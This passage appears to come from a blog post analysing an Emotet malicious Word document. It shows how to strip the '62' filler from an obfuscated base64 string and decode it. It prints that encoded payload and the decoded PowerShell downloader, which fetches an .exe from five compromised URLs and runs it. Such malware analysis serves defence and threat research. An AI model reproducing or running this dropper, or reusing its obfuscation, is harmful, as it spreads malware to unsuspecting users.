00000CE0: 36 32 41 44 6B 41 36 32  5A 51 42 69 36 32 41 44  62ADkA62ZQBi62AD
00000CF0: 30 41 36 32 4A 77 42 68  36 32 41 44 41 41 36 32  0A62JwBh62ADAA62
00000D00: 65 41 42 6D 36 32 41 44  41 41 36 32 4D 41 41 32  eABm62ADAA62MAA2
00000D10: 36 32 41 47 4D 41 36 32  59 67 41 34 36 32 41 44  62AGMA62YgA462AD
00000D20: 49 41 36 32 4E 41 41 79  36 32 41 47 59 41 36 32  IA62NAAy62AGYA62
00000D30: 4E 51 41 31 36 32 41 44  67 41 36 32 59 77 41 6E  NQA162ADgA62YwAn
00000D40: 36 32 41 44 73 41 36 32  59 67 42 79 36 32 41 47  62ADsA62YgBy62AG
00000D50: 55 41 36 32 59 51 42 72  36 32 41 44 73 41 36 32  UA62YQBr62ADsA62
00000D60: 4A 41 42 68 36 32 41 44  41 41 36 32 65 41 42 6B  JABh62ADAA62eABk
00000D70: 36 32 41 47 45 41 36 32  4F 51 41 77 36 32 41 47  62AGEA62OQAw62AG
00000D80: 4D 41 36 32 4E 41 42 6D  36 32 41 47 45 41 36 32  MA62NABm62AGEA62
00000D90: 5A 67 42 6C 36 32 41 47  4D 41 36 32 50 51 41 6E  ZgBl62AGMA62PQAn
00000DA0: 36 32 41 47 45 41 36 32  4D 41 42 34 36 32 41 47  62AGEA62MAB462AG
00000DB0: 55 41 36 32 5A 67 42 6A  36 32 41 47 45 41 36 32  UA62ZgBj62AGEA62
00000DC0: 4D 77 42 6B 36 32 41 47  45 41 36 32 4F 51 41 78  MwBk62AGEA62OQAx
00000DD0: 36 32 41 44 67 41 36 32  5A 67 41 32 36 32 41 47  62ADgA62ZgA262AG
00000DE0: 49 41 36 32 4E 41 41 6E  36 32 41 48 30 41 36 32  IA62NAAn62AH0A62
00000DF0: 66 51 42 6A 36 32 41 47  45 41 36 32 64 41 42 6A  fQBj62AGEA62dABj
00000E00: 36 32 41 47 67 41 36 32  65 77 42 39 36 32 41 48  62AGgA62ewB962AH
00000E10: 30 41 36 32 4A 41 42 68  36 32 41 44 41 41 36 32  0A62JABh62ADAA62
00000E20: 65 41 41 77 36 32 41 44  49 41 36 32 5A 51 41 34  eAAw62ADIA62ZQA4
00000E30: 36 32 41 44 55 41 36 32  4D 41 41 78 36 32 41 47  62ADUA62MAAx62AG
00000E40: 55 41 36 32 4E 67 41 79  36 32 41 47 49 41 36 32  UA62NgAy62AGIA62
00000E50: 4D 51 42 69 36 32 41 47  51 41 36 32 59 77 41 39  MQBi62AGQA62YwA9
00000E60: 36 32 41 43 63 41 36 32  59 51 41 77 36 32 41 48  62ACcA62YQAw62AH
00000E70: 67 41 36 32 5A 51 41 30  36 32 41 47 59 41 36 32  gA62ZQA062AGYA62
00000E80: 4F 51 42 68 36 32 41 44  51 41 36 32 5A 51 41 78  OQBh62ADQA62ZQAx
00000E90: 36 32 41 47 45 41 36 32  59 77 41 79 36 32 41 43  62AGEA62YwAy62AC
00000EA0: 63 41 00 00 00 02 18 00  35 00 00 00 07 00 00 80  cA......5.......
00000EB0: E1 00 00 00 00 02 00 00  43 61 6C 69 62 72 69 0C  ........Calibri.

Based on this output, we can see there are a lot of ’62’s’ in the base64 string. Since we know that there is a function that gets called that looks for a ’62’ and replaces it with a null value (“”), we can assume that the Powershelll code is being run through this as well and that ’62’ need to be scrubbed from the base64 statement. I switched over to CyberChef to do the rest of the heavy lifting for me. The recipe for this is pretty simple: find/replace ’62’ with null, de-base64 the string, remove null bits, and then another find/replace looking for ‘;’ and replacing that with ‘\n.’ The actual recipe with the base64 string can be found here.

Once you do that, you get the following initial emotet URLs.

[# https://www.microsoft.com/ #] $a0xf0550f2e56ddc='a0x1e77b851d4'
$a0xb2cc7d0239 = '317'
$a0x998f18422e3f='a0xba55f03be3b21da'
$a0x9a2b5a1338f50=$env:userprofile+'\'+$a0xb2cc7d0239+'.exe'
$a0x04985d7b57='a0x2a81ddac75b2e'
$a0x2e259a7884=&('new-o'+'bje'+'c'+'t') nET.WeBCLIENt
$a0x67da7f98266='https://filegst.com/wp-admin/Kl/*https://www.merceko.com/wp-content/1ek7/*https://kampusmania.com/wp-content/4f2c8/*https://vps333.com/07h31/1gjy9/*http://nuttlefiberart.com/wp-admin/eIDCaO/'."sP`Lit"('*')
$a0x3f778273ac45d='a0x980bc8313ff'
foreach($a0x76db24d017 in $a0x67da7f98266){try{$a0x2e259a7884."DO`W`NLOA`dFile"($a0x76db24d017, $a0x9a2b5a1338f50)
$a0xa87aa84ce09c='a0xd487dedb312e'
If ((&('Get-I'+'t'+'em') $a0x9a2b5a1338f50)."Le`NgtH" -ge 30323) {[Diagnostics.Process]::"sT`ART"($a0x9a2b5a1338f50)
$a0xe37807825ab49eb='a0xf006cb8242f558c'
break
$a0xda90c4fafec='a0xefca3da918f6b4'}}catch{}}$a0x02e8501e62b1bdc='a0xe4f9a4e1ac2'

NOTE: The all the most recent emotet macros also have included the “[# https://www.microsoft.com/ #]” at the front of the script. Not sure why, but it has been there in most examples.

The other way of looking at this and seeing if you don’t want to go through all the above steps is to use another tool from Didier Stevens called strings.py.

Using strings.py, I like using the ‘-L’ flag to sort the strings output from shortest to longest as seen below:

herbie$ ./strings.py -L /attach/FA_10063455599_10142019.doc
bjbj
h0'L
h0'L
.... [ more text ] ....
DocumentSummaryInformation
Microsoft Forms 2.0 TextBox
Microsoft Forms 2.0 TextBox
Microsoft Forms 2.0 TextBox
Microsoft Forms 2.0 TextBox
Microsoft Forms 2.0 TextBox
Microsoft Forms 2.0 TextBox
GC="CFCD22322232AB33AB3354"
 CONTROL Forms.TextBox.1 \s 
 CONTROL Forms.TextBox.1 \s 
 CONTROL Forms.TextBox.1 \s 
 CONTROL Forms.TextBox.1 \s 
 CONTROL Forms.TextBox.1 \s 
 CONTROL Forms.TextBox.1 \s 
.... [ more text ] ....
 https://isaias.info/synthesizing/books-sports--games/solid-state https://jessika.biz/cambridgeshire
PAAj62ACAA62aAB062AHQA62cABz62ADoA62LwAv62AHcA62dwB362AC4A62bQBp62AGMA62cgBv62AHMA62bwBm62AHQA62LgBj_
 https://lauretta.org/money-market-account/b2b/kentucky https://roselyn.net/invoice/applications/bus 
 http://pascale.name/intelligent-plastic-mouse/steel/withdrawal https://keira.name/overpass/gold/toys
 .... [ more text ] ....
[a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/]
62AG8A62bQAv62ACAA62IwA+62ACAA62JABh62ADAA62eABm62ADAA62NQA162ADAA62ZgAy62AGUA62NQA262AGQA62ZABj62AD0A62JwBh62ADAA62eAAx62AGUA62NwA362AGIA62OAA162ADEA62ZAA062ACcA62OwAk62AGEA62MAB462AGIA62MgBj62AGMA62NwBk62ADAA62MgAz62ADkA62IAA962ACAA62JwAz62ADEA62NwAn62ADsA62JABh62ADAA62eAA562ADkA62OABm62ADEA62OAA062ADIA62MgBl62ADMA62ZgA962ACcA62YQAw62AHgA62YgBh62ADUA62NQBm62ADAA62MwBi62AGUA62MwBi62ADIA62MQBk62AGEA62JwA762ACQA62YQAw62AHgA62OQBh62ADIA62YgA162AGEA62MQAz62ADMA62OABm62ADUA62MAA962ACQA62ZQBu62AHYA62OgB162AHMA62ZQBy62AHAA62cgBv62AGYA62aQBs62AGUA62KwAn62AFwA62JwAr62ACQA62YQAw62AHgA62YgAy62AGMA62YwA362AGQA62MAAy62ADMA62OQAr62ACcA62LgBl62AHgA62ZQAn62ADsA62JABh62ADAA62eAAw62ADQA62OQA462ADUA62ZAA362AGIA62NQA362AD0A62JwBh62ADAA62eAAy62AGEA62OAAx62AGQA62ZABh62AGMA62NwA162AGIA62MgBl62ACcA62OwAk62AGEA62MAB462ADIA62ZQAy62ADUA62OQBh62ADcA62OAA462ADQA62PQAm62ACgA62JwBu62AGUA62dwAt62AG8A62JwAr62ACcA62YgBq62AGUA62JwAr62ACcA62YwAn62ACsA62JwB062ACcA62KQAg62AG4A62RQBU62AC4A62VwBl62AEIA62QwBM62AEkA62RQBO62AHQA62OwAk62AGEA62MAB462ADYA62NwBk62AGEA62NwBm62ADkA62OAAy62ADYA62NgA962ACcA62aAB062AHQA62cABz62ADoA62LwAv62AGYA62aQBs62AGUA62ZwBz62AHQA62LgBj62AG8A62bQAv62AHcA62cAAt62AGEA62ZABt62AGkA62bgAv62AEsA62bAAv62ACoA62aAB062AHQA62cABz62ADoA62LwAv62AHcA62dwB362AC4A62bQBl62AHIA62YwBl62AGsA62bwAu62AGMA62bwBt62AC8A62dwBw62AC0A62YwBv62AG4A62dABl62AG4A62dAAv62ADEA62ZQBr62ADcA62LwAq62AGgA62dAB062AHAA62cwA662AC8A62LwBr62AGEA62bQBw62AHUA62cwBt62AGEA62bgBp62AGEA62LgBj62AG8A62bQAv62AHcA62cAAt62AGMA62bwBu62AHQA62ZQBu62AHQA62LwA062AGYA62MgBj62ADgA62LwAq62AGgA62dAB062AHAA62cwA662AC8A62LwB262AHAA62cwAz62ADMA62MwAu62AGMA62bwBt62AC8A62MAA362AGgA62MwAx62AC8A62MQBn62AGoA62eQA562AC8A62KgBo62AHQA62dABw62ADoA62LwAv62AG4A62dQB062AHQA62bABl62AGYA62aQBi62AGUA62cgBh62AHIA62dAAu62AGMA62bwBt62AC8A62dwBw62AC0A62YQBk62AG0A62aQBu62AC8A62ZQBJ62AEQA62QwBh62AE8A62LwAn62AC4A62IgBz62AFAA62YABM62AGkA62dAAi62ACgA62JwAq62ACcA62KQA762ACQA62YQAw62AHgA62MwBm62ADcA62NwA462ADIA62NwAz62AGEA62YwA062ADUA62ZAA962ACcA62YQAw62AHgA62OQA462ADAA62YgBj62ADgA62MwAx62ADMA62ZgBm62ACcA62OwBm62AG8A62cgBl62AGEA62YwBo62ACgA62JABh62ADAA62eAA362ADYA62ZABi62ADIA62NABk62ADAA62MQA362ACAA62aQBu62ACAA62JABh62ADAA62eAA262ADcA62ZABh62ADcA62ZgA562ADgA62MgA262ADYA62KQB762AHQA62cgB562AHsA62JABh62ADAA62eAAy62AGUA62MgA162ADkA62YQA362ADgA62OAA062AC4A62IgBE62AE8A62YABX62AGAA62TgBM62AE8A62QQBg62AGQA62RgBp62AGwA62ZQAi62ACgA62JABh62ADAA62eAA362ADYA62ZABi62ADIA62NABk62ADAA62MQA362ACwA62IAAk62AGEA62MAB462ADkA62YQAy62AGIA62NQBh62ADEA62MwAz62ADgA62ZgA162ADAA62KQA762ACQA62YQAw62AHgA62YQA462ADcA62YQBh62ADgA62NABj62AGUA62MAA562AGMA62PQAn62AGEA62MAB462AGQA62NAA462ADcA62ZABl62AGQA62YgAz62ADEA62MgBl62ACcA62OwBJ62AGYA62IAAo62ACgA62JgAo62ACcA62RwBl62AHQA62LQBJ62ACcA62KwAn62AHQA62JwAr62ACcA62ZQBt62ACcA62KQAg62ACQA62YQAw62AHgA62OQBh62ADIA62YgA162AGEA62MQAz62ADMA62OABm62ADUA62MAAp62AC4A62IgBM62AGUA62YABO62AGcA62dABI62ACIA62IAAt62AGcA62ZQAg62ADMA62MAAz62ADIA62MwAp62ACAA62ewBb62AEQA62aQBh62AGcA62bgBv62AHMA62dABp62AGMA62cwAu62AFAA62cgBv62AGMA62ZQBz62AHMA62XQA662ADoA62IgBz62AFQA62YABB62AFIA62VAAi62ACgA62JABh62ADAA62eAA562AGEA62MgBi62ADUA62YQAx62ADMA62MwA462AGYA62NQAw62ACkA62OwAk62AGEA62MAB462AGUA62MwA362ADgA62MAA362ADgA62MgA162AGEA62YgA062ADkA62ZQBi62AD0A62JwBh62ADAA62eABm62ADAA62MAA262AGMA62YgA462ADIA62NAAy62AGYA62NQA162ADgA62YwAn62ADsA62YgBy62AGUA62YQBr62ADsA62JABh62ADAA62eABk62AGEA62OQAw62AGMA62NABm62AGEA62ZgBl62AGMA62PQAn62AGEA62MAB462AGUA62ZgBj62AGEA62MwBk62AGEA62OQAx62ADgA62ZgA262AGIA62NAAn62AH0A62fQBj62AGEA62dABj62AGgA62ewB962AH0A62JABh62ADAA62eAAw62ADIA62ZQA462ADUA62MAAx62AGUA62NgAy62AGIA62MQBi62AGQA62YwA962ACcA62YQAw62AHgA62ZQA062AGYA62OQBh62ADQA62ZQAx62AGEA62YwAy62ACcA

With the above information, all you need is the first line of the base64 (notice PAA at the beginning):

PAAj62ACAA62aAB062AHQA62cABz62ADoA62LwAv62AHcA62dwB362AC4A62bQBp62AGMA62cgBv62AHMA62bwBm62AHQA62LgBj_

and combine that with the rest of the base64 string at the bottom of the output:

62AG8A62bQAv62ACAA62IwA+62ACAA62JABh62ADAA62eABm62ADAA62NQA162ADAA62ZgAy62AGUA62NQA262AGQA62ZABj62AD0A62JwBh62ADAA62eAAx62AGUA62NwA362AGIA62OAA162ADEA62ZAA062ACcA62OwAk62AGEA62MAB462AGIA62MgBj62AGMA62NwBk62ADAA62MgAz62ADkA62IAA962ACAA62JwAz62ADEA62NwAn62ADsA62JABh62ADAA62eAA562ADkA62OABm62ADEA62OAA062ADIA62MgBl62ADMA62ZgA962ACcA62YQAw62AHgA62YgBh62ADUA62NQBm62ADAA62MwBi62AGUA62MwBi62ADIA62MQBk62AGEA62JwA762ACQA62YQAw62AHgA62OQBh62ADIA62YgA162AGEA62MQAz62ADMA62OABm62ADUA62MAA962ACQA62ZQBu62AHYA62OgB162AHMA62ZQBy62AHAA62cgBv62AGYA62aQBs62AGUA62KwAn62AFwA62JwAr62ACQA62YQAw62AHgA62YgAy62AGMA62YwA362AGQA62MAAy62ADMA62OQAr62ACcA62LgBl62AHgA62ZQAn62ADsA62JABh62ADAA62eAAw62ADQA62OQA462ADUA62ZAA362AGIA62NQA362AD0A62JwBh62ADAA62eAAy62AGEA62OAAx62AGQA62ZABh62AGMA62NwA162AGIA62MgBl62ACcA62OwAk62AGEA62MAB462ADIA62ZQAy62ADUA62OQBh62ADcA62OAA462ADQA62PQAm62ACgA62JwBu62AGUA62dwAt62AG8A62JwAr62ACcA62YgBq62AGUA62JwAr62ACcA62YwAn62ACsA62JwB062ACcA62KQAg62AG4A62RQBU62AC4A62VwBl62AEIA62QwBM62AEkA62RQBO62AHQA62OwAk62AGEA62MAB462ADYA62NwBk62AGEA62NwBm62ADkA62OAAy62ADYA62NgA962ACcA62aAB062AHQA62cABz62ADoA62LwAv62AGYA62aQBs62AGUA62ZwBz62AHQA62LgBj62AG8A62bQAv62AHcA62cAAt62AGEA62ZABt62AGkA62bgAv62AEsA62bAAv62ACoA62aAB062AHQA62cABz62ADoA62LwAv62AHcA62dwB362AC4A62bQBl62AHIA62YwBl62AGsA62bwAu62AGMA62bwBt62AC8A62dwBw62AC0A62YwBv62AG4A62dABl62AG4A62dAAv62ADEA62ZQBr62ADcA62LwAq62AGgA62dAB062AHAA62cwA662AC8A62LwBr62AGEA62bQBw62AHUA62cwBt62AGEA62bgBp62AGEA62LgBj62AG8A62bQAv62AHcA62cAAt62AGMA62bwBu62AHQA62ZQBu62AHQA62LwA062AGYA62MgBj62ADgA62LwAq62AGgA62dAB062AHAA62cwA662AC8A62LwB262AHAA62cwAz62ADMA62MwAu62AGMA62bwBt62AC8A62MAA362AGgA62MwAx62AC8A62MQBn62AGoA62eQA562AC8A62KgBo62AHQA62dABw62ADoA62LwAv62AG4A62dQB062AHQA62bABl62AGYA62aQBi62AGUA62cgBh62AHIA62dAAu62AGMA62bwBt62AC8A62dwBw62AC0A62YQBk62AG0A62aQBu62AC8A62ZQBJ62AEQA62QwBh62AE8A62LwAn62AC4A62IgBz62AFAA62YABM62AGkA62dAAi62ACgA62JwAq62ACcA62KQA762ACQA62YQAw62AHgA62MwBm62ADcA62NwA462ADIA62NwAz62AGEA62YwA062ADUA62ZAA962ACcA62YQAw62AHgA62OQA462ADAA62YgBj62ADgA62MwAx62ADMA62ZgBm62ACcA62OwBm62AG8A62cgBl62AGEA62YwBo62ACgA62JABh62ADAA62eAA362ADYA62ZABi62ADIA62NABk62ADAA62MQA362ACAA62aQBu62ACAA62JABh62ADAA62eAA262ADcA62ZABh62ADcA62ZgA562ADgA62MgA262ADYA62KQB762AHQA62cgB562AHsA62JABh62ADAA62eAAy62AGUA62MgA162ADkA62YQA362ADgA62OAA062AC4A62IgBE62AE8A62YABX62AGAA62TgBM62AE8A62QQBg62AGQA62RgBp62AGwA62ZQAi62ACgA62JABh62ADAA62eAA362ADYA62ZABi62ADIA62NABk62ADAA62MQA362ACwA62IAAk62AGEA62MAB462ADkA62YQAy62AGIA62NQBh62ADEA62MwAz62ADgA62ZgA162ADAA62KQA762ACQA62YQAw62AHgA62YQA462ADcA62YQBh62ADgA62NABj62AGUA62MAA562AGMA62PQAn62AGEA62MAB462AGQA62NAA462ADcA62ZABl62AGQA62YgAz62ADEA62MgBl62ACcA62OwBJ62AGYA62IAAo62ACgA62JgAo62ACcA62RwBl62AHQA62LQBJ62ACcA62KwAn62AHQA62JwAr62ACcA62ZQBt62ACcA62KQAg62ACQA62YQAw62AHgA62OQBh62ADIA62YgA162AGEA62MQAz62ADMA62OABm62ADUA62MAAp62AC4A62IgBM62AGUA62YABO62AGcA62dABI62ACIA62IAAt62AGcA62ZQAg62ADMA62MAAz62ADIA62MwAp62ACAA62ewBb62AEQA62aQBh62AGcA62bgBv62AHMA62dABp62AGMA62cwAu62AFAA62cgBv62AGMA62ZQBz62AHMA62XQA662ADoA62IgBz62AFQA62YABB62AFIA62VAAi62ACgA62JABh62ADAA62eAA562AGEA62MgBi62ADUA62YQAx62ADMA62MwA462AGYA62NQAw62ACkA62OwAk62AGEA62MAB462AGUA62MwA362ADgA62MAA362ADgA62MgA162AGEA62YgA062ADkA62ZQBi62AD0A62JwBh62ADAA62eABm62ADAA62MAA262AGMA62YgA462ADIA62NAAy62AGYA62NQA162ADgA62YwAn62ADsA62YgBy62AGUA62YQBr62ADsA62JABh62ADAA62eABk62AGEA62OQAw62AGMA62NABm62AGEA62ZgBl62AGMA62PQAn62AGEA62MAB462AGUA62ZgBj62AGEA62MwBk62AGEA62OQAx62ADgA62ZgA262AGIA62NAAn62AH0A62fQBj62AGEA62dABj62AGgA62ewB962AH0A62JABh62ADAA62eAAw62ADIA62ZQA462ADUA62MAAx62AGUA62NgAy62AGIA62MQBi62AGQA62YwA962ACcA62YQAw62AHgA62ZQA062AGYA62OQBh62ADQA62ZQAx62AGEA62YwAy62ACcA

From here, you can use the same CyberChef recipe mentioned above to get the initial URLs for emotet.

Leave a Reply

Your email address will not be published. Required fields are marked *